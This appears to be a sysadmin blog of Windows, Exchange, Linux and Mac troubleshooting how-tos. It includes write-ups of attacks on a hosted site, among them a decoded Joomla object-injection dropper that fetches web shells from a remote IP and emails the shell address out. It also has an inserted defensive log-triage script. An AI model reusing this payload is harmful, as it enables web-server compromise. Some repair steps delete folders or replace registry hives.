• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click STARTUP-SETTINGS
• -the computer will reboot and give the options to press F1 through F9
• -press F3 to try low-resolution video as sometimes Windows 10 suddenly doesn't like the video drivers.
• -or press F5 to try to get to safe-mode-with-networking.

ISSUE 5 - sfc

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: sfc /scannow
• -let it go through its process and restart.

ISSUE 6 - windowsapps folder

For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"):

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y
• -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t
• -type: rd /s "C:\Program Files\WindowsApps"
• -reboot and see if that works.

ISSUE 7 - There is a registry error.

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: d:
• -hit enter
• -type: cd windows
• -hit enter
• -type: cd system32
• -hit enter
• -type: cd config
• -hit enter
• -type: ren default default1
• -hit enter
• -type: ren sam sam1
• -hit enter
• -type: ren software software1
• -hit enter
• -type: ren security security1
• -hit enter
• -type: ren system system1
• -hit enter
• -type: cd regback
• -hit enter
• -type: copy * ..\
• (that is: copy-space-asterisk-space-dot-dot-backslash)
• -hit enter
• -type: exit
• -let it reboot and see if that works.

ISSUE 8 - There is a boot problem.

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: bootrec.exe /fixmbr
• -type: bootrec.exe /fixboot
• -type: bootrec.exe /RebuildBcd
• -type: exit
• -let it reboot and see if that works.

ISSUE 9 - dism

This is the only issue that I have not tried personally as I've never had to get this far.
The idea is that there is something wrong with Windows and that it can be repaired:

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: dism /online /cleanup-image /scanhealth
• -type: dism /online /cleanup-image /restorehealth
• -let it go through its process and restart.

ISSUE 10 - reload and transfer

If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal but usually by this point, reloading and transferring data is going to be faster than further troubleshooting.

Those are the 10 issues that I go through when I get, "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop.

## 1-3-2 Bios Beeps Dell Precision T3500

Dell Precision T3500 boots fine. Upon reboot, the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen.

The only way to get it to reboot properly without the bios beeps is to yank the power from the computer. Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button.

But here's how to fix:

• -upgrade the bios.
• -reset to defaults.
• -turn off the FAST BOOT.
• -disable the DISKETTE DRIVE.
• -uncheck the ONBOARD OR USB FLOPPY DRIVE.
• -uncheck the ONBOARD OR USB CD DRIVE.

While we are at it, change the silly default options:

• -disable LOW-POWER-MODE.
• -enable HYPER-THREADING (if you have it).
• -enable MULTICORE.
• -enable TURBOBOOST.
• -disable SPEEDSTEP.
• -enable SMART TEST.

There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE.

NOTES:

• -this was a 6 month process :-(
• -replacing the 525W power supply with a 850W power supply didn't work.
## WINDOWS 10 Falls Asleep After 2 Minutes

MANUAL EDIT:

01 -click START > RUN > CMD (or POWERSHELL) (as administrator)
02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /d 2
03 -enter
04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /d 2
05 -enter
06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on the "Change advanced power settings".
07 -click on the "Change settings that are currently unavailable"
08 -click Sleep > System unattended sleep timeout > type 0
09 -click USB-SETTINGS > USB-3-LINK-POWER-MANAGEMENT > set to OFF
10 -click OK
11 That's it!!! You did it!!!

## OFFICE 2013 ACTIVATION

I'm not an expert on ACTIVATION as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here.

Here's how:

• -click START > RUN
• -type: cmd
• -type: cd C:\Program Files\Microsoft Office\Office15

From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE.

GET STATUS

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

CHANGE KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

ACTIVATE KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

The result will look something like this:

RESULT

Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
---Processing--------------------------
---------------------------------------
SKU ID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
LICENSE NAME: Office 15, OfficeStandardVL_MAK edition
LICENSE DESCRIPTION: Office 15, RETAIL(MAK) channel
LICENSE STATUS: ---LICENSED---
Last 5 characters of installed product key: XXXXX
---------------------------------------
---------------------------------------
---Exiting-----------------------------

Sometimes, there is a double install where 2 different versions are installed at the same time. A KMS version and a MAK version. You can find out by:

SEE ALL KEYS THAT ARE TRYING TO ACTIVATE

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

UNINSTALL KEY THAT ISN'T CORRECT

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits

THEN IMMEDIATELY INSTALL AN MAK KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

THEN ACTIVATE

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

## Windows 10 ISO

To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1 until the end of JULY 2016.

To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here:
http://go.microsoft.com/fwlink/?LinkId=691209

Now you have a bootable USB disk.

But what if you want to create a multiple boot USB disk where WINDOWS 10 is just one of the options? You would somehow have to create a WINDOWS 10 ISO.

I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut.

• -download the E2B project here: (http://www.easy2boot.com)
• -unzip the download.
• -click MAKE_E2B_USB_DRIVE (run as admin) (CAUTION!!! This will delete everything on the USB drive.)
• -install your ISO/IMG/IMGPTN in the appropriate place.

Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways.
### FIRST WAY TO GET WINDOWS 10 ISO

Download the ISO from the link using GOOGLE-CHROME'S ANDROID VIEW:

• -open CHROME
• -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS
• -a window opens on the right hand side.
• -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right hand side). (It is the second one from the left.)
• -then visit the following page: https://www.microsoft.com/en-us/software-download/windows10ISO
• -you will see 4 options:
  WINDOWS 10 (all languages)
  WINDOWS 10 K (Korean law)
  WINDOWS 10 N (European law)
  WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES)

For me, doing this somehow downloaded the iso as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.ESD to say WINDOWS 10 PRO. I do not know yet if it matters.

NOTE: If you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having are that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.

### SECOND WAY TO GET WINDOWS 10 ISO

So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it?

You don't turn it into an ISO. You turn it into an IMG (more specifically an imgPTN file). I won't go into details but you can't turn an entire bootable USB into an ISO easily. There are too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN.

Here's how to turn it into a BOOTABLE IMG.

• -download the software to create a PARTITION IMAGE here: http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip
• -unzip it.
• -open the ImDisk\imdiskinst.exe file and run it to install the driver.
• -right-click CREATEDESKTOPSHORTCUTS.CMD and RUN-AS-ADMINISTRATOR.
• -plug in your BOOTABLE USB drive.
• -the computer will assign a drive letter (for example DRIVE G).
• -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut.
• -it will create an image of the USB drive.
• -wait.
• -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\).
• -click MAKE_THIS_DRIVE_CONTIGUOUS

That's it!!!! You've done it.

## Creating Resource Rooms in Exchange 2013

Creating resource rooms in EXCHANGE 2013 can be complicated as the GUI doesn't work in a straight-forward manner.

Here's how I did it:

• New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room
• Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer
• Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept

This will allow users to set an appointment with the ROOM as the LOCATION but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment).

## Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52 which was resolving to catchmeapp.com

NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker.
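The request logged below carries a serialized PHP object and a base64-wrapped payload in the User-Agent field of the access log. As an added example (not part of the original post), this Python script triages such log lines without executing anything: it lists the serialized class names, peels nested `base64_decode('...')` layers, and pulls out the URLs and web paths the payload references. The sample log lines, the 192.0.2.10 address and the file names are constructed for the example.

```python
import base64
import binascii
import re

# Combined-log-format tail: "request" status bytes "referer" "user-agent".
# Apache writes embedded quotes as \" so both fields allow backslash escapes.
LOG = re.compile(
    r'"(?P<req>[A-Z]+ \S+ HTTP/[\d.]+)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# PHP serialized object header, e.g. O:21:\"JDatabaseDriverMysqli\"
SERIALIZED_OBJ = re.compile(r'O:\d+:\\?"([A-Za-z_]\w*)\\?"')
# base64_decode('...') call; whitespace is allowed because log dumps get wrapped.
B64_CALL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)")
URL = re.compile(r"https?://[^\s'\"<>)]+")
WEB_PATH = re.compile(r"[\"'](/[\w./-]+\.(?:php|htm))[\"']")


def peel_base64(text, max_depth=5):
    """Decode every base64_decode('...') argument, layer by layer.

    Returns the decoded layers, outermost first. Nothing is ever executed.
    """
    layers = []
    queue = [(text, 0)]
    while queue:
        current, depth = queue.pop(0)
        if depth >= max_depth:
            continue
        for match in B64_CALL.finditer(current):
            blob = "".join(match.group(1).split())
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64, skip it
            decoded = raw.decode("utf-8", "replace")
            layers.append(decoded)
            queue.append((decoded, depth + 1))
    return layers


def triage(line):
    """Return a findings dict for a suspicious log line, or None."""
    m = LOG.search(line)
    if not m:
        return None
    for field in ("ref", "ua"):
        value = m.group(field)
        classes = SERIALIZED_OBJ.findall(value)
        layers = peel_base64(value)
        if not classes and not layers:
            continue
        decoded = "\n".join(layers)
        return {
            "field": field,
            "request": m.group("req"),
            "status": int(m.group("status")),
            "classes": classes,
            "layers": len(layers),
            "urls": sorted(set(URL.findall(decoded))),
            "paths": sorted(set(WEB_PATH.findall(decoded))),
        }
    return None


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed, inert sample: two nested layers, elided ("...") serialized body.
STAGE2 = ("<?php $t = http_get('http://192.0.2.10/get/a.txt'); "
          "$f = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/joomla/a.php\"; ?>")
STAGE1 = ("$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/joomla/x.php\"; "
          "fwrite(fopen($check, \"w+\"), base64_decode('" + _b64(STAGE2) + "'));")
SAMPLE_UA = (
    r'}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";'
    r'O:17:\"JSimplepieFactory\":0:{}...s:8:\"feed_url\";s:0:\"'
    + "eval(base64_decode('" + _b64(STAGE1) + "'));..."
    + r'\";...}'
)
SAMPLE_LINE = ('203.0.113.7 - - [01/Jun/2016:10:00:00 +0000] '
               '"GET / HTTP/1.1" 301 236 "-" "' + SAMPLE_UA + '"')
BENIGN_LINE = ('203.0.113.8 - - [01/Jun/2016:10:00:05 +0000] '
               '"GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    for log_line in (SAMPLE_LINE, BENIGN_LINE):
        print(triage(log_line))
```

The extracted URLs and paths are the indicators to search for on disk and in outbound proxy logs.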
==========================
GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3810:\"eval(base64_decode('...'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
===============================================

This translates into:

===============================================
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('...'));
fclose($fp);
================================================

Which further is decoded to:

================================================
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im); curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://74.208.47.52/get/css.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://74.208.47.52/get/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;
$text3 = http_get('http://74.208.47.52/get/w.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://74.208.47.52/get/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://74.208.47.52/get/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;
$text6 = http_get('http://74.208.47.52/get/user.txt');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "email1@example.com,email2@example.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen <sender@example.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);
?>
===============================================

Nice try... but not this time.

## Hacking Attempt 16-05

Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com

=============================
/%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20var%20prefix%20=%20%27ma%27%20+%20%27il%27%20+%20%27to%27;%20var%20path%20=%20%27hr%27%20+%20%27ef%27%20+%20%27=%27;%20var%20addy64466%20=%20%27PetersHyland%27%20+%20%27@%27;%20addy64466%20=%20addy64466%20+%20%27ipre%27%20+%20%27.%27%20+%20%27com%27;%20document.write%28%27%3Ca%20%27%20+%20path%20+%20%27%5C%27%27%20+%20prefix%20+%20%27:%27%20+%20addy64466%20+%20%27%5C%27%3E%27%29;%20document.write%28addy64466%29;%20document.write%28%27%3C%5C/a%3E%27%29;%20/--%3E%5Cn%20%3C/script%3E%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20document.write%28%27%3Cspan%20style=%5C%27display:%20none;%5C%27%3E%27%29;%20/--%3E%20%3C/script%3EThis%20email%20address%20is%20being%20protected%20from%20spambots.%20You%20need%20JavaScript%20enabled%20to%20view%20it.%20%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20document.write%28%27%3C/%27%29;%20document.write%28%27span%3E%27%29;%20/--%3E%20%3C/script%3E
==============================

This translates into:

==============================
<script type='text/javascript'> <!-- var prefix = 'ma' + 'il' + 'to'; var path = 'hr' + 'ef' + '='; var addy64466 = 'PetersHyland' + '@'; addy64466 = addy64466 + 'ipre' + '.' + 'com'; document.write('<a ' + path + '\'' + prefix + ':' + addy64466 + '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script>
==============================

This was repeated in a brute force attack, changing the password for every attempt.

Nice one... but not this time.

## Clean Install Windows 10

Clean installing Windows 10 can be a pain. There are so many gotchas that it can be frustrating.

Here's how I did it:

• -download the MEDIA CREATION TOOL for WINDOWS 10.
• -after you have created the USB, check to make sure you have the right BUILD NUMBER (see other article post).
• -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS. (NOTE: this is in contrast to WINDOWS 8, which requires you to NOT select "I don't have a product key" as activation will not be successful.)

## Find Windows 10 ISO Version or Build Number

Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8.

• -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD.
• -find where the "install.wim" (or install.esd) is. For example: F:\sources\install.wim
• -open CMD
• -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1
• -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1

This will show the details of the INSTALL.WIM file.

NOTE: -in some cases, Windows-7 will not be able to read a Windows-10 install.esd file :-(

## Re-enable Mailbox in Exchange 2013

If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However if you disable a MAILBOX in EXCHANGE and you disable an AD account, the MAILBOX will not show as a disconnected MAILBOX.

Here's how to get it back on demand.
First, check to see the RETENTION settings of the MAILBOXDATABASE:

Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention

Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:

Get-MailboxStatistics -Database "Mailbox-Database-Name-Here"

You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account needed.

Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here

Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:

Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here" | Get-MailboxStatistics | Where { $_.DisplayName -eq "full-display-name-here" } | Connect-Mailbox -User "username-here"

## Windows 8/8.1/10 Product Keys

SITUATION

You have a new computer and you test out Linux destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive.

RESOLUTION

Find a pc that has a DVD drive.

1-create an ISO with 7ZIP.

• -select the DVD DRIVE.
• -click VIEW (at the top).
• -click OPEN ROOT FOLDER.
• -click VIEW (at the top).
• -click UP ONE LEVEL.
• -in the main window you will see: \\. (backslash, backslash, dot).
• -double-click \\.
• -select the DVD drive.
• -click FILE > COPY-TO (at the top)
• -select the folder where you want the ISO to go.

2-copy that ISO to your EASY2BOOT USB.

• -easy squeezy.

NOTE: if you do not have one, get one. It's super easy. Run tool. Have USB.

3-install WINDOWS.

• -the install should use the PRODUCT KEY from the UEFI (or in layman's terms BIOS).
• -if you are being prompted for a product key, it means that you have the wrong installation media and that's when the Windows 8.1/10 installer can't detect Windows 8/8.1 product key from UEFI firmware (BIOS).
• -it will prompt which version to install, WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO
• -do NOT select "I don't have a product key". Activation will not be successful.

4-find WINDOWS PRODUCT KEY in the UEFI.

• -open the tool.
• -click ACPI (at the top).
• -click MSDM tab (towards the top)
• -look at the last line, it is the embedded PRODUCT KEY ;-)

There are other ways to do this such as:

• -open COMMAND PROMPT.
• -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey

As well as other ways.

NOTES:

## Wrong Time on Ubuntu - NTP

SCENARIO

Fresh install of Ubuntu. Wrong time. Day later, still wrong time.

HOW TO FIX THE WRONG TIME ON UBUNTU

• -edit /etc/ntp.conf
• -comment out the "pool" servers.
• -comment out the fallback "pool" server.
• -type: server 192.168.1.1 (or local server/router/switch that can provide NTP services)
• -save
• -stop service: /etc/init.d/ntp stop
• -start service: /etc/init.d/ntp start

This may happen for various reasons. For me, the high-end firewall was blocking outside NTP servers from talking on port 123.

NOTES: do not use/install ntpdate package, it is deprecated.

## Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS

Getting Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS can be not-so-straight-forward especially if you are not from the Linux world.

TO INSTALL:

• open TERMINAL
• type: sudo dpkg -i digitalwatchdog-client-2.4.1.10278-x64-release.deb
• (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER).
• go through the setup process.

On UBUNTU 14.02, you are finished. On UBUNTU 16.0.4, you need the following:

• type: sudo apt-get install libgstreamer-plugins-base0.10-dev

That's it! You should now be able to use the Digital Watchdog Spectrum client.

## Testing HD with Smartctl & Finding the Filesystem

Hmmm. Something is wrong with SDA. Let's test it:

smartctl -t short /dev/sda

And look at the results:

smartctl -a /dev/sda

The last 5 result log shows:
Error: UNC 8 sectors at LBA = 0x00384622 = 3687970

SMART Self-test log structure revision number 1
Num Test_Description Status Remaining LifeTime(hours) LBA_of_first_error
# 1 Short offline Completed: read failure 10% 44084 976766499

So we have to find the filesystem. Usually it would be:

# fdisk -lu /dev/sda

I get:

Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders, total 976773168 sectors
Units = sectors of 1 * 512 = 512 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 208769 104384+ fd Linux raid autodetect
Partition 1 does not end on cylinder boundary.
/dev/sda2 208770 976768063 488279647 fd Linux raid autodetect

Using:
((976766499- 208770) * 512) / 4096

We get:
122069716 LBA block.

But wait, the filesystem isn't on sda, it's on /dev/main/root. Here's how:

# cat /etc/fstab
/dev/main/root / ext3 usrquota,grpquota 1 1
/dev/md1 /boot ext3 defaults 1 2
/dev/main/swap swap swap defaults 0 0

So we know the file system is on /dev/main/root and it is of type ext3.

We can find the BLOCK SIZE by:

# tune2fs -l /dev/main/root | grep Block

I get:

Block count:              121561088
Block size:               4096
Blocks per group:         32768

We're still at 122069716 LBA block.
Or specifically 122069716.125 or the second of 8 sectors in this block.

We can test the block by:

# debugfs
debugfs 1.39 (29-May-2006)
debugfs:  open /dev/main/root
debugfs:  testb 122069716
Illegal block number passed to ext2fs_test_block_bitmap #122069716 for block bitmap for /dev/main/root
Block 122069716 not in use
debugfs:  quit

In short, it looks like this:

==================================================================
sda1  sdb1
|
md1

sdb1 sdb2
|
md2
|
pv (md2)
|
vg (main)
/            \
lv (main/root)        lv (main/swap)

## Transfer Hard Drive to New Hardware

Transfer hard drive to new hardware. It can be done.

• -take note of current setup bios for the ATA, AHCI, RAID setup.
• -run c:\windows\system32\sysprep\sysprep.exe
• -click GENERALIZE
• -wait an hour and let it shutdown.
• -transfer to new hardware.
• -boot pc
• -change bios to match old setup.
• -wait for it to boot

All of your stuff should be intact.

If for some reason that doesn't work, you can always load the drivers into Windows in an offline manner.

• -find your motherboard model number.
• -extract them to the C drive (for example: c:\drivers\chipset)
• -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
• -click REPAIR YOUR COMPUTER (bottom-left).
• -click COMMAND PROMPT.
• -find what letter your WINDOWS-DIRECTORY is.
• -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse
• -hit ENTER
• -type EXIT
• -reboot

## DNS Servers

I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones.

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5

8.8.8.8
8.8.4.4

137.65.1.1
137.65.1.2
137.65.1.3

75.75.75.75
75.75.76.76

### OPENDNS SERVERS

208.67.222.222
208.67.220.220

You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe.

To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN.

• -open shell of some kind (putty, command, power, etc)
• -type: dig daknetworks.com
• -type: nslookup daknetworks.com

To ask a question of a specific server:

• -type: dig daknetworks.com @4.2.2.2
• -type: nslookup daknetworks.com 4.2.2.2

To ask a specific type of record:

• -type: dig -t mx daknetworks.com
• -type: nslookup -type=mx daknetworks.com

To ask for an authoritative record:

• -type: dig -t ns daknetworks.com
• -type: nslookup -type=soa daknetworks.com

To ask for all the info:

• -type: nslookup -debug daknetworks.com 1.2.3.4

## Clone MacBook Pro Hard Drive With Boot Camp

I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro?

ps- I have Boot Camp with a Windows partition.
pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-)

• -clone the drive (clonezilla).
• -resize the Windows Boot Camp partition (gparted).
• -sync the partition tables (gparted).
• -resize the OSX partition (diskutil).
• -fix the Windows bootloader (Windows).

NEEDED
-usb with ubcd with parted magic (UBCD is universal boot cd).
-host system.
-Windows 7/8 cd/usb (or a Windows repair disk).

CLONE
-plug both ssd's into the host system.
-boot via usb.
-start parted-magic.
-start clonezilla
-clone disk to disk
-wait till finished
(this could take awhile)

MOVE/RESIZE WINDOWS PARTITION
-you should still be in parted-magic
-start gparted
-resize windows partition as needed (grab the handles)
-move windows partition to the end
-move the osx recovery boot loader next to the windows partition
-apply changes
-wait
-after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS.

SYNC FOR BOOT CAMP
-you should still be in parted-magic
-open terminal
-type: sudo gptsync /dev/sda (or other device such as sdb sdc sdd. gparted will show you).
-confirm Y
-shutdown

RESIZE OSX PARTITION
-boot into os x with the new, larger hd.
-open Disk Utility.
-click the disk on the left hand side.
-click the PARTITION button (at the top).
-select the volume you want to grow.
-look at the info-window (at the bottom).
-note the Disk Identifier (mine was disk0s2).
-open Terminal.
-type the following command: diskutil resizeVolume /dev/disk0s2 limits
-it will show the current size, minimum size and maximum size.
-note the maximum size (mine was 254.2GB. Do not get the part in parentheses.)
-type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB
(NOTE: the number above requires a GB but no space.)
-wait.
-shutdown

This also works if you get messages like "No boot device found" etc.

This happens when the items get fouled up. How do you know if items are fouled up?
Boot MacBook Pro to Windows either:
-through holding the OPTION key on boot up (after chime).
-boot into OSX and go to SYSTEM-PREFERENCES and choose the START-UP DISK.
-you will see "No boot device" or Windows is going into repair mode on its own.

In either case, the following will work as a full instruction set. Adjust as needed.

-insert Windows 7/8 cd/usb (or a Windows repair disk).
-boot while holding OPTION key.
-wait until the windows 7 cd/usb shows (it could take a minute).
-select Windows 7.
-click NEXT.
-select REPAIR YOUR COMPUTER (bottom left).
-click NO (for automatic repair).
-click NEXT (at bottom right).
-click COMMAND PROMPT.
-type: bootrec /scanos.
(If it isn't already there, it should find the WINDOWS installation and ask if you want to add it.)
-type: Y

-type: Diskpart
-type: LIST DISK
-type: SELECT DISK 0 (change this to the number of the disk . most likely 0)
-type: LIST PARTITION
-type: SELECT PARTITION 4 (change this to your partition number. most likely 4)
-type: DETAIL PARTITION
(it will show the details of the partition. We're trying to find the partition with the windows installation.)
-if you found it, it will probably say ACTIVE: NO
-type: ACTIVE
-type: EXIT

-type: bootrec /fixmbr (needed?)
-type: bootrec /fixboot (needed?)
-type: bootrec /rebuildbcd
-type: exit
-click RESTART

CHECKDISK
